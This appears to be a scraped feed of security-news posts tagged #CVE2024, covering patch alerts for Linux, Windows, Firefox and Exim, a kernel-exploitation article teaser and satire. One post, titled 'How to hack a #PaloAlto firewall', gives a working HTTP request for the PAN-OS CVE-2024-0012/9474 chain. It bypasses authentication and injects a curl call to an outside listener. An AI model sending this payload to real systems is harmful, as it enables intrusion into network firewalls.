⚠️ تحذير لمستخدمي لينكس: ثغرة CVE‑2024‑XXXXX في مكتبة libc تسمح بسرقة مفاتيح SSH والوصول الكامل إلى الخوادم.

🔑 أهم ما يجب فعله الآن
- حدّث جميع التوزيعات إلى الإصدار المصحّح.
- فعّل المصادقة الثنائية وقلل أذونات ملفات المفاتيح.
- راقب سجلات الدخول للأنشطة غير العادية.

#LinuxSecurity #SSH #CVE2024 #OpenSource #Privacy

🔗 https://news.google.com/rss/articles/CBMiVkFVX3lxTE5ReUltNTZEVXctVktmUGhVWXBSX2FERU9LM3gzYVlTZ1ZfbmNWSXZnSF9ETDdzZHZpZHgtUS1FWGpmZ055amVGY2w2TGZLT011TmxhLWtB?oc=5

Before you continue

🚨 The Great CVE-2024-Yikes "Oopsie" Saga 🚨: Another day, another "critical" incident resolved by sheer accident 🙄. Apparently, a chain reaction of security fails involving #JavaScript, #Rust, and #Python ended up being "somehow fine" in 73 hours. But don't worry, they totally take security seriously—just like their 14 previous incidents! 😂🔒
https://nesbitt.io/2026/02/03/incident-report-cve-2024-yikes.html #CVE2024 #Yikes #SecurityFails #14Incidents #HackerNews #ngated
Incident Report: CVE-2024-YIKES

A series of unfortunate events.

Andrew Nesbitt
Incident Report: CVE-2024-YIKES

A series of unfortunate events.

Andrew Nesbitt
Kernel-hack-drill and a new approach to exploiting CVE-2024-50264 in the Linux kernel

Some memory corruption bugs are much harder to exploit than others. They can involve race conditions, crash the system, and impose limitations that make a researcher's life difficult. Working with such fragile vulnerabilities demands significant time and effort. CVE-2024-50264 in the Linux kernel is one such hard bug, which received the Pwnie Award 2025 as the Best Privilege Escalation. In this article, I introduce my personal project kernel-hack-drill and show how it helped me to exploit CVE-2024-50264.

Alexander Popov
🐍 Exciting news for Python enthusiasts! Check out "python strikes again" by Low Level! In this video, they dive into CVE-2024-48990 and explore how the needsrestart program can automatically restart outdated packages. Don't miss it! Watch here: https://youtu.be/CDtIS8XaJDY or Invidious: https://invidious.reallyaweso.me/watch?v=CDtIS8XaJDY #Python #CVE2024 #LowLevel #Programming #CyberSecurity
python strikes again

YouTube
Microsoft's December Patch Tuesday is here! 🎉 It addresses 72 vulnerabilities, including a critical zero-day flaw (CVE-2024-49138) that could give attackers SYSTEM privileges. 🚨 Windows users should update ASAP to stay secure! 💻🔒 Read more about the fixes and how to apply them here: https://cyberinsider.com/windows-11-december-patch-tuesday-fixes-72-flaws-one-zero-day/ #Windows11 #CyberSecurity #PatchTuesday #CVE2024
#newz
Windows 11 December Patch Tuesday Fixes 72 Flaws, One Zero-Day

Microsoft's December Windows Patch addresses 72 flaws, including an actively exploited zero-day flaw in the Common Log File System Driver.

CyberInsider

How to hack a #PaloAlto firewall:

POST /php/utils/createRemoteAppwebSession.php/aaaa.js.map HTTP/1.1
Host: {{Hostname}}
X-PAN-AUTHCHECK: off
Content-Type: application/x-www-form-urlencoded
Content-Length: 99

user=`curl {{listening-host}}`&userRole=superuser&remoteHost=&vsys=vsys1

https://labs.watchtowr.com/pots-and-pans-aka-an-sslvpn-palo-alto-pan-os-cve-2024-0012-and-cve-2024-9474/

#CVE20240012 #CVE20249474 #CVE #CVE2024

Pots and Pans, AKA an SSLVPN - Palo Alto PAN-OS CVE-2024-0012 and CVE-2024-9474

It'll be no surprise that 2024, 2023, 2022, and every other year of humanities' existence has been tough for SSLVPN appliances. Anyhow, there are new vulnerabilities (well, two of them) that are being exploited in the Palo Alto Networks firewall and SSLVPN offering, and as ever, we’re here to

watchTowr Labs

🚨 Did you know cyber espionage groups like Earth Simnavaz can remain undetected for months, exploiting vulnerabilities like CVE-2024-30088 to target critical infrastructure? 🔒

Tip: Always patch known vulnerabilities quickly—delaying can leave systems exposed to advanced threats like these!

How do you prioritize patch management in your organization? 🤔

Dive deeper into this evolving threat on our blog: https://guardiansofcyber.com/cybersecurity-news/earth-simnavaz-cyberattacks-exploiting-cve-2024-30088-to-target-uae-critical-infrastructure-with-stealthy-backdoors/

#Cybersecurity #GuardiansOfCyber #Guardians #APT #Vulnerability #ZeroDay #EarthSimnavaz #CyberThreats #CriticalInfrastructure #CVE2024

🚨 Did you know a simple animation bug could leave your entire browser vulnerable? The latest CVE-2024-9680 exploit targets Firefox and Thunderbird, allowing attackers to execute code without you even knowing! 😨

To stay safe: Update your browser ASAP and always keep auto-updates enabled. These tiny steps make a huge difference in staying protected. 🔒

Have you ever been caught off guard by an update you didn't take seriously? Share your stories below!

Read more about the vulnerability and how to protect yourself: https://guardiansofcyber.com/cybersecurity-news/critical-cve-2024-9680-firefox-and-thunderbird-vulnerabilities-exploited-in-the-wild-patch-now-to-prevent-code-execution-attacks/

#Cybersecurity #GuardiansOfCyber #Guardians #CVE2024 #FirefoxVulnerability #PatchNow #BrowserSecurity #CyberAlert #InfoSec #StaySafeOnline

Critical Exim vulnerability affects 1.5 million servers worldwide

A critical security vulnerability in the widely-used mail transfer agent (MTA) Exim has put over 1.5 million email servers at risk worldwide. This issue,

Stack Diary